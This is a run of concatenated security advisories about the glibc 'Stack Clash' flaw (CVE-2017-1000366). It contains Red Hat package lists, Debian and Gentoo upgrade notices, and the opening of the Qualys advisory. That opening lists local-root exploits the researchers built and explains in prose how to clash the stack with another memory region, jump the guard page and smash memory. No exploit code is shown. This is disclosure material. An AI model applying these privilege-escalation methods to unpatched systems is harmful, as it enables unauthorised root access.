ELS):\n\nSource:\nglibc-2.5-123.el5_11.4.src.rpm\n\ni386:\nglibc-2.5-123.el5_11.4.i386.rpm\nglibc-2.5-123.el5_11.4.i686.rpm\nglibc-common-2.5-123.el5_11.4.i386.rpm\nglibc-debuginfo-2.5-123.el5_11.4.i386.rpm\nglibc-debuginfo-2.5-123.el5_11.4.i686.rpm\nglibc-debuginfo-common-2.5-123.el5_11.4.i386.rpm\nglibc-devel-2.5-123.el5_11.4.i386.rpm\nglibc-headers-2.5-123.el5_11.4.i386.rpm\nglibc-utils-2.5-123.el5_11.4.i386.rpm\nnscd-2.5-123.el5_11.4.i386.rpm\n\ns390x:\nglibc-2.5-123.el5_11.4.s390.rpm\nglibc-2.5-123.el5_11.4.s390x.rpm\nglibc-common-2.5-123.el5_11.4.s390x.rpm\nglibc-debuginfo-2.5-123.el5_11.4.s390.rpm\nglibc-debuginfo-2.5-123.el5_11.4.s390x.rpm\nglibc-devel-2.5-123.el5_11.4.s390.rpm\nglibc-devel-2.5-123.el5_11.4.s390x.rpm\nglibc-headers-2.5-123.el5_11.4.s390x.rpm\nglibc-utils-2.5-123.el5_11.4.s390x.rpm\nnscd-2.5-123.el5_11.4.s390x.rpm\n\nx86_64:\nglibc-2.5-123.el5_11.4.i686.rpm\nglibc-2.5-123.el5_11.4.x86_64.rpm\nglibc-common-2.5-123.el5_11.4.x86_64.rpm\nglibc-debuginfo-2.5-123.el5_11.4.i386.rpm\nglibc-debuginfo-2.5-123.el5_11.4.i686.rpm\nglibc-debuginfo-2.5-123.el5_11.4.x86_64.rpm\nglibc-debuginfo-common-2.5-123.el5_11.4.i386.rpm\nglibc-devel-2.5-123.el5_11.4.i386.rpm\nglibc-devel-2.5-123.el5_11.4.x86_64.rpm\nglibc-headers-2.5-123.el5_11.4.x86_64.rpm\nglibc-utils-2.5-123.el5_11.4.x86_64.rpm\nnscd-2.5-123.el5_11.4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.7):\n\nSource:\nglibc-2.12-1.166.el6_7.8.src.rpm\n\nx86_64:\nglibc-2.12-1.166.el6_7.8.i686.rpm\nglibc-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-common-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-devel-2.12-1.166.el6_7.8.i686.rpm\nglibc-devel-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-headers-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-utils-2.12-1.166.el6_7.8.x86_64.rpm\nnscd-2.12-1.166.el6_7.8.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional EUS (v. 6.7):\n\nx86_64:\nglibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-static-2.12-1.166.el6_7.8.i686.rpm\nglibc-static-2.12-1.166.el6_7.8.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.2):\n\nSource:\nglibc-2.12-1.47.el6_2.18.src.rpm\n\nx86_64:\nglibc-2.12-1.47.el6_2.18.i686.rpm\nglibc-2.12-1.47.el6_2.18.x86_64.rpm\nglibc-common-2.12-1.47.el6_2.18.x86_64.rpm\nglibc-debuginfo-2.12-1.47.el6_2.18.i686.rpm\nglibc-debuginfo-2.12-1.47.el6_2.18.x86_64.rpm\nglibc-debuginfo-common-2.12-1.47.el6_2.18.i686.rpm\nglibc-debuginfo-common-2.12-1.47.el6_2.18.x86_64.rpm\nglibc-devel-2.12-1.47.el6_2.18.i686.rpm\nglibc-devel-2.12-1.47.el6_2.18.x86_64.rpm\nglibc-headers-2.12-1.47.el6_2.18.x86_64.rpm\nglibc-utils-2.12-1.47.el6_2.18.x86_64.rpm\nnscd-2.12-1.47.el6_2.18.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.4):\n\nSource:\nglibc-2.12-1.107.el6_4.10.src.rpm\n\nx86_64:\nglibc-2.12-1.107.el6_4.10.i686.rpm\nglibc-2.12-1.107.el6_4.10.x86_64.rpm\nglibc-common-2.12-1.107.el6_4.10.x86_64.rpm\nglibc-debuginfo-2.12-1.107.el6_4.10.i686.rpm\nglibc-debuginfo-2.12-1.107.el6_4.10.x86_64.rpm\nglibc-debuginfo-common-2.12-1.107.el6_4.10.i686.rpm\nglibc-debuginfo-common-2.12-1.107.el6_4.10.x86_64.rpm\nglibc-devel-2.12-1.107.el6_4.10.i686.rpm\nglibc-devel-2.12-1.107.el6_4.10.x86_64.rpm\nglibc-headers-2.12-1.107.el6_4.10.x86_64.rpm\nglibc-utils-2.12-1.107.el6_4.10.x86_64.rpm\nnscd-2.12-1.107.el6_4.10.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.5):\n\nSource:\nglibc-2.12-1.132.el6_5.9.src.rpm\n\nx86_64:\nglibc-2.12-1.132.el6_5.9.i686.rpm\nglibc-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-common-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-debuginfo-2.12-1.132.el6_5.9.i686.rpm\nglibc-debuginfo-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-debuginfo-common-2.12-1.132.el6_5.9.i686.rpm\nglibc-debuginfo-common-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-devel-2.12-1.132.el6_5.9.i686.rpm\nglibc-devel-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-headers-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-utils-2.12-1.132.el6_5.9.x86_64.rpm\nnscd-2.12-1.132.el6_5.9.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 6.5):\n\nSource:\nglibc-2.12-1.132.el6_5.9.src.rpm\n\nx86_64:\nglibc-2.12-1.132.el6_5.9.i686.rpm\nglibc-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-common-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-debuginfo-2.12-1.132.el6_5.9.i686.rpm\nglibc-debuginfo-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-debuginfo-common-2.12-1.132.el6_5.9.i686.rpm\nglibc-debuginfo-common-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-devel-2.12-1.132.el6_5.9.i686.rpm\nglibc-devel-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-headers-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-utils-2.12-1.132.el6_5.9.x86_64.rpm\nnscd-2.12-1.132.el6_5.9.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.6):\n\nSource:\nglibc-2.12-1.149.el6_6.12.src.rpm\n\nx86_64:\nglibc-2.12-1.149.el6_6.12.i686.rpm\nglibc-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-common-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-debuginfo-2.12-1.149.el6_6.12.i686.rpm\nglibc-debuginfo-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-debuginfo-common-2.12-1.149.el6_6.12.i686.rpm\nglibc-debuginfo-common-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-devel-2.12-1.149.el6_6.12.i686.rpm\nglibc-devel-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-headers-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-utils-2.12-1.149.el6_6.12.x86_64.rpm\nnscd-2.12-1.149.el6_6.12.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 6.6):\n\nSource:\nglibc-2.12-1.149.el6_6.12.src.rpm\n\nx86_64:\nglibc-2.12-1.149.el6_6.12.i686.rpm\nglibc-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-common-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-debuginfo-2.12-1.149.el6_6.12.i686.rpm\nglibc-debuginfo-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-debuginfo-common-2.12-1.149.el6_6.12.i686.rpm\nglibc-debuginfo-common-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-devel-2.12-1.149.el6_6.12.i686.rpm\nglibc-devel-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-headers-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-utils-2.12-1.149.el6_6.12.x86_64.rpm\nnscd-2.12-1.149.el6_6.12.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 6.7):\n\nSource:\nglibc-2.12-1.166.el6_7.8.src.rpm\n\ni386:\nglibc-2.12-1.166.el6_7.8.i686.rpm\nglibc-common-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm\nglibc-devel-2.12-1.166.el6_7.8.i686.rpm\nglibc-headers-2.12-1.166.el6_7.8.i686.rpm\nglibc-utils-2.12-1.166.el6_7.8.i686.rpm\nnscd-2.12-1.166.el6_7.8.i686.rpm\n\nppc64:\nglibc-2.12-1.166.el6_7.8.ppc.rpm\nglibc-2.12-1.166.el6_7.8.ppc64.rpm\nglibc-common-2.12-1.166.el6_7.8.ppc64.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.ppc.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.ppc64.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.ppc.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.ppc64.rpm\nglibc-devel-2.12-1.166.el6_7.8.ppc.rpm\nglibc-devel-2.12-1.166.el6_7.8.ppc64.rpm\nglibc-headers-2.12-1.166.el6_7.8.ppc64.rpm\nglibc-utils-2.12-1.166.el6_7.8.ppc64.rpm\nnscd-2.12-1.166.el6_7.8.ppc64.rpm\n\ns390x:\nglibc-2.12-1.166.el6_7.8.s390.rpm\nglibc-2.12-1.166.el6_7.8.s390x.rpm\nglibc-common-2.12-1.166.el6_7.8.s390x.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.s390.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.s390x.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.s390.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.s390x.rpm\nglibc-devel-2.12-1.166.el6_7.8.s390.rpm\nglibc-devel-2.12-1.166.el6_7.8.s390x.rpm\nglibc-headers-2.12-1.166.el6_7.8.s390x.rpm\nglibc-utils-2.12-1.166.el6_7.8.s390x.rpm\nnscd-2.12-1.166.el6_7.8.s390x.rpm\n\nx86_64:\nglibc-2.12-1.166.el6_7.8.i686.rpm\nglibc-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-common-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-devel-2.12-1.166.el6_7.8.i686.rpm\nglibc-devel-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-headers-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-utils-2.12-1.166.el6_7.8.x86_64.rpm\nnscd-2.12-1.166.el6_7.8.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.2):\n\nSource:\nglibc-2.12-1.47.el6_2.18.src.rpm\n\nx86_64:\nglibc-debuginfo-2.12-1.47.el6_2.18.i686.rpm\nglibc-debuginfo-2.12-1.47.el6_2.18.x86_64.rpm\nglibc-debuginfo-common-2.12-1.47.el6_2.18.i686.rpm\nglibc-debuginfo-common-2.12-1.47.el6_2.18.x86_64.rpm\nglibc-static-2.12-1.47.el6_2.18.i686.rpm\nglibc-static-2.12-1.47.el6_2.18.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.4):\n\nSource:\nglibc-2.12-1.107.el6_4.10.src.rpm\n\nx86_64:\nglibc-debuginfo-2.12-1.107.el6_4.10.i686.rpm\nglibc-debuginfo-2.12-1.107.el6_4.10.x86_64.rpm\nglibc-debuginfo-common-2.12-1.107.el6_4.10.i686.rpm\nglibc-debuginfo-common-2.12-1.107.el6_4.10.x86_64.rpm\nglibc-static-2.12-1.107.el6_4.10.i686.rpm\nglibc-static-2.12-1.107.el6_4.10.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.5):\n\nSource:\nglibc-2.12-1.132.el6_5.9.src.rpm\n\nx86_64:\nglibc-debuginfo-2.12-1.132.el6_5.9.i686.rpm\nglibc-debuginfo-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-debuginfo-common-2.12-1.132.el6_5.9.i686.rpm\nglibc-debuginfo-common-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-static-2.12-1.132.el6_5.9.i686.rpm\nglibc-static-2.12-1.132.el6_5.9.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 6.5):\n\nSource:\nglibc-2.12-1.132.el6_5.9.src.rpm\n\nx86_64:\nglibc-debuginfo-2.12-1.132.el6_5.9.i686.rpm\nglibc-debuginfo-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-debuginfo-common-2.12-1.132.el6_5.9.i686.rpm\nglibc-debuginfo-common-2.12-1.132.el6_5.9.x86_64.rpm\nglibc-static-2.12-1.132.el6_5.9.i686.rpm\nglibc-static-2.12-1.132.el6_5.9.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.6):\n\nx86_64:\nglibc-debuginfo-2.12-1.149.el6_6.12.i686.rpm\nglibc-debuginfo-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-debuginfo-common-2.12-1.149.el6_6.12.i686.rpm\nglibc-debuginfo-common-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-static-2.12-1.149.el6_6.12.i686.rpm\nglibc-static-2.12-1.149.el6_6.12.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 6.6):\n\nx86_64:\nglibc-debuginfo-2.12-1.149.el6_6.12.i686.rpm\nglibc-debuginfo-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-debuginfo-common-2.12-1.149.el6_6.12.i686.rpm\nglibc-debuginfo-common-2.12-1.149.el6_6.12.x86_64.rpm\nglibc-static-2.12-1.149.el6_6.12.i686.rpm\nglibc-static-2.12-1.149.el6_6.12.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 6.7):\n\ni386:\nglibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm\nglibc-static-2.12-1.166.el6_7.8.i686.rpm\n\nppc64:\nglibc-debuginfo-2.12-1.166.el6_7.8.ppc.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.ppc64.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.ppc.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.ppc64.rpm\nglibc-static-2.12-1.166.el6_7.8.ppc.rpm\nglibc-static-2.12-1.166.el6_7.8.ppc64.rpm\n\ns390x:\nglibc-debuginfo-2.12-1.166.el6_7.8.s390.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.s390x.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.s390.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.s390x.rpm\nglibc-static-2.12-1.166.el6_7.8.s390.rpm\nglibc-static-2.12-1.166.el6_7.8.s390x.rpm\n\nx86_64:\nglibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm\nglibc-debuginfo-common-2.12-1.166.el6_7.8.x86_64.rpm\nglibc-static-2.12-1.166.el6_7.8.i686.rpm\nglibc-static-2.12-1.166.el6_7.8.x86_64.rpm\n\nRed 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7.2):\n\nSource:\nglibc-2.17-106.el7_2.9.src.rpm\n\nppc64:\nglibc-2.17-106.el7_2.9.ppc.rpm\nglibc-2.17-106.el7_2.9.ppc64.rpm\nglibc-common-2.17-106.el7_2.9.ppc64.rpm\nglibc-debuginfo-2.17-106.el7_2.9.ppc.rpm\nglibc-debuginfo-2.17-106.el7_2.9.ppc64.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.ppc.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.ppc64.rpm\nglibc-devel-2.17-106.el7_2.9.ppc.rpm\nglibc-devel-2.17-106.el7_2.9.ppc64.rpm\nglibc-headers-2.17-106.el7_2.9.ppc64.rpm\nglibc-utils-2.17-106.el7_2.9.ppc64.rpm\nnscd-2.17-106.el7_2.9.ppc64.rpm\n\nppc64le:\nglibc-2.17-106.el7_2.9.ppc64le.rpm\nglibc-common-2.17-106.el7_2.9.ppc64le.rpm\nglibc-debuginfo-2.17-106.el7_2.9.ppc64le.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.ppc64le.rpm\nglibc-devel-2.17-106.el7_2.9.ppc64le.rpm\nglibc-headers-2.17-106.el7_2.9.ppc64le.rpm\nglibc-utils-2.17-106.el7_2.9.ppc64le.rpm\nnscd-2.17-106.el7_2.9.ppc64le.rpm\n\ns390x:\nglibc-2.17-106.el7_2.9.s390.rpm\nglibc-2.17-106.el7_2.9.s390x.rpm\nglibc-common-2.17-106.el7_2.9.s390x.rpm\nglibc-debuginfo-2.17-106.el7_2.9.s390.rpm\nglibc-debuginfo-2.17-106.el7_2.9.s390x.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.s390.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.s390x.rpm\nglibc-devel-2.17-106.el7_2.9.s390.rpm\nglibc-devel-2.17-106.el7_2.9.s390x.rpm\nglibc-headers-2.17-106.el7_2.9.s390x.rpm\nglibc-utils-2.17-106.el7_2.9.s390x.rpm\nnscd-2.17-106.el7_2.9.s390x.rpm\n\nx86_64:\nglibc-2.17-106.el7_2.9.i686.rpm\nglibc-2.17-106.el7_2.9.x86_64.rpm\nglibc-common-2.17-106.el7_2.9.x86_64.rpm\nglibc-debuginfo-2.17-106.el7_2.9.i686.rpm\nglibc-debuginfo-2.17-106.el7_2.9.x86_64.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.i686.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.x86_64.rpm\nglibc-devel-2.17-106.el7_2.9.i686.rpm\nglibc-devel-2.17-106.el7_2.9.x86_64.rpm\nglibc-headers-2.17-106.el7_2.9.x86_64.rpm\nglibc-utils-2.17-106.el7_2.9.x86_64.rpm\nnscd-2.17-106.el7_2.9.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 7.2):\n\nppc64:\nglibc-debuginfo-2.17-106.el7_2.9.ppc.rpm\nglibc-debuginfo-2.17-106.el7_2.9.ppc64.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.ppc.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.ppc64.rpm\nglibc-static-2.17-106.el7_2.9.ppc.rpm\nglibc-static-2.17-106.el7_2.9.ppc64.rpm\n\nppc64le:\nglibc-debuginfo-2.17-106.el7_2.9.ppc64le.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.ppc64le.rpm\nglibc-static-2.17-106.el7_2.9.ppc64le.rpm\n\ns390x:\nglibc-debuginfo-2.17-106.el7_2.9.s390.rpm\nglibc-debuginfo-2.17-106.el7_2.9.s390x.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.s390.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.s390x.rpm\nglibc-static-2.17-106.el7_2.9.s390.rpm\nglibc-static-2.17-106.el7_2.9.s390x.rpm\n\nx86_64:\nglibc-debuginfo-2.17-106.el7_2.9.i686.rpm\nglibc-debuginfo-2.17-106.el7_2.9.x86_64.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.i686.rpm\nglibc-debuginfo-common-2.17-106.el7_2.9.x86_64.rpm\nglibc-static-2.17-106.el7_2.9.i686.rpm\nglibc-static-2.17-106.el7_2.9.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-1000366\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/stackguard\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2017 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFZSDV3XlSAg2UNWIIRAibeAKC2QtxViqngTTBVM9fvG1XjRCkgwACgrHP1\nPVr1sUH9RUhxrQOKQqWtnKY=\n=ywUB\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. For the full details, please refer to their advisory\npublished at:\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 2.19-18+deb8u10. \n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2.24-11+deb9u1. \n\nFor the unstable distribution (sid), this problem will be fixed soon. \n\nWe recommend that you upgrade your glibc packages. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201706-19\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: GNU C Library: Multiple vulnerabilities\n Date: June 20, 2017\n Bugs: #608698, #608706, #622220\n ID: 201706-19\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in the GNU C Library, the\nworst of which may allow execution of arbitrary code. \n\nBackground\n==========\n\nThe GNU C library is the standard C library used by Gentoo Linux\nsystems. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll GNU C Library users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=sys-libs/glibc-2.23-r4\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-5180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5180\n[ 2 ] CVE-2016-6323\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6323\n[ 3 ] CVE-2017-1000366\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-1000366\n[ 4 ] Qualys Security Advisory - The Stack Clash\n https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201706-19\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n\n--cxbO5eT2swQBqr8k9tc6wcfapgLAJb4xR--\n\n. \nQualys Security Advisory\n\nThe Stack Clash\n\n\n========================================================================\nContents\n========================================================================\n\nI. Introduction\nII. Problem\n II.1. Automatic stack expansion\n II.2. Stack guard-page\n II.3. Stack-clash exploitation\nIII. Solutions\nIV. Results\n IV.1. Linux\n IV.2. OpenBSD\n IV.3. NetBSD\n IV.4. FreeBSD\n IV.5. Solaris\nV. Acknowledgments\n\n\n========================================================================\nI. Introduction\n========================================================================\n\nOur research started with a 96-megabyte surprise:\n\nb97bb000-b97dc000 rw-p 00000000 00:00 0 [heap]\nbf7c6000-bf806000 rw-p 00000000 00:00 0 [stack]\n\nand a 12-year-old question: \"If the heap grows up, and the stack grows\ndown, what happens when they clash? Is it exploitable? How?\"\n\n- In 2005, Gael Delalleau presented \"Large memory management\n vulnerabilities\" and the first stack-clash exploit in user-space\n (against mod_php 4.3.0 on Apache 2.0.53):\n\n http://cansecwest.com/core05/memory_vulns_delalleau.pdf\n\n- In 2010, Rafal Wojtczuk published \"Exploiting large memory management\n vulnerabilities in Xorg server running on Linux\", the second\n stack-clash exploit in user-space (CVE-2010-2240):\n\n http://www.invisiblethingslab.com/resources/misc-2010/xorg-large-memory-attacks.pdf\n\n- Since 2010, security researchers have exploited several stack-clashes\n in the kernel-space; for example:\n\n https://jon.oberheide.org/blog/2010/11/29/exploiting-stack-overflows-in-the-linux-kernel/\n https://jon.oberheide.org/files/infiltrate12-thestackisback.pdf\n https://googleprojectzero.blogspot.com/2016/06/exploiting-recursion-in-linux-kernel_20.html\n\nIn user-space, however, this problem has been greatly underestimated;\nthe only public exploits are Gael Delalleau\u0027s and Rafal Wojtczuk\u0027s, and\nthey were written before Linux introduced a protection against\nstack-clashes (a \"guard-page\" mapped below the stack):\n\nhttps://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2240\n\nIn this advisory, we show that stack-clashes are widespread in\nuser-space, and exploitable despite the stack guard-page; we discovered\nmultiple vulnerabilities in guard-page implementations, and devised\ngeneral methods for:\n\n- \"Clashing\" the stack with another memory region: we allocate memory\n until the stack reaches another memory region, or until another memory\n region reaches the stack;\n\n- \"Jumping\" over the stack guard-page: we move the stack-pointer from\n the stack and into the other memory region, without accessing the\n stack guard-page;\n\n- \"Smashing\" the stack, or the other memory region: we overwrite the\n stack with the other memory region, or the other memory region with\n the stack. \n\nTo illustrate our findings, we developed the following exploits and\nproofs-of-concepts:\n\n- a local-root exploit against Exim (CVE-2017-1000369, CVE-2017-1000376)\n on i386 Debian;\n\n- a local-root exploit against Sudo (CVE-2017-1000367, CVE-2017-1000366)\n on i386 Debian, Ubuntu, CentOS;\n\n- an independent Sudoer-to-root exploit against CVE-2017-1000367 on any\n SELinux-enabled distribution;\n\n- a local-root exploit against ld.so and most SUID-root binaries\n (CVE-2017-1000366, CVE-2017-1000370) on i386 Debian, Fedora, CentOS;\n\n- a local-root exploit against ld.so and most SUID-root PIEs\n (CVE-2017-1000366, CVE-2017-1000371) on i386 Debian, Ubuntu, Fedora;\n\n- a local-root exploit against /bin/su (CVE-2017-1000366,\n CVE-2017-1000365) on i386 Debian;\n\n- a proof-of-concept that gains eip control against Sudo on i386\n grsecurity/PaX (CVE-2017-1000367, CVE-2017-1000366, CVE-2017-1000377);\n\n- a local proof-of-concept that gains rip control against Exim\n (CVE-2017-1000369) on amd64 Debian;\n\n- a local-root exploit against ld.so and most SUID-root binaries\n (CVE-2017-1000366, CVE-2017-1000379) on amd64 Debian, Ubuntu, Fedora,\n CentOS;\n\n- a proof-of-concept against /usr/bin/at on i386 OpenBSD, for\n CVE-2017-1000372 in OpenBSD\u0027s stack guard-page implementation and\n CVE-2017-1000373 in OpenBSD\u0027s qsort() function;\n\n- a proof-of-concept for CVE-2017-1000374 and CVE-2017-1000375 in\n NetBSD\u0027s stack guard-page implementation;\n\n- a proof-of-concept for CVE-2017-1085 in FreeBSD\u0027s setrlimit()\n RLIMIT_STACK implementation;\n\n- two proofs-of-concept for CVE-2017-1083 and CVE-2017-1084 in FreeBSD\u0027s\n stack guard-page implementation;\n\n- a local-root exploit against /usr/bin/rsh (CVE-2017-3630,\n CVE-2017-3629, CVE-2017-3631) on Solaris 11. \n\n\n========================================================================\nII. Problem\n========================================================================\n\nNote: in this advisory, the \"start of the stack\" is the lowest address\nof its memory region, and the \"end of the stack\" is the highest address\nof its memory region; we do not use the ambiguous terms \"top of the\nstack\" and \"bottom of the stack\". \n\n========================================================================\nII.1. Automatic stack expansion\n========================================================================\n\nThe user-space stack of a process is automatically expanded by the\nkernel:\n\n- if the stack-pointer (the esp register, on i386) reaches the start of\n the stack and the unmapped memory pages below (the stack grows down,\n on i386),\n\n- then a \"page-fault\" exception is raised and caught by the kernel,\n\n- and the page-fault handler transparently expands the user-space stack\n of the process (it decreases the start address of the stack),\n\n- or it terminates the process with a SIGSEGV if the stack expansion\n fails (for example, if the RLIMIT_STACK is reached). \n\nUnfortunately, this stack expansion mechanism is implicit and fragile:\nit relies on page-fault exceptions, but if another memory region is\nmapped directly below the stack, then the stack-pointer can move from\nthe stack into the other memory region without raising a page-fault,\nand:\n\n- the kernel cannot tell that the process needed more stack memory;\n\n- the process cannot tell that its stack-pointer moved from the stack\n into another memory region. \n\nIn contrast, the heap expansion mechanism is explicit and robust: the\nprocess uses the brk() system-call to tell the kernel that it needs more\nheap memory, and the kernel expands the heap accordingly (it increases\nthe end address of the heap memory region -- the heap always grows up). \n\n========================================================================\nII.2. Stack guard-page\n========================================================================\n\nThe fragile stack expansion mechanism poses a security threat: if the\nstack-pointer of a process can move from the stack into another memory\nregion (which ends exactly where the stack starts) without raising a\npage-fault, then:\n\n- the process uses this other memory region as if it were an extension\n of the stack;\n\n- a write to this stack extension smashes the other memory region;\n\n- a write to the other memory region smashes the stack extension. \n\nTo 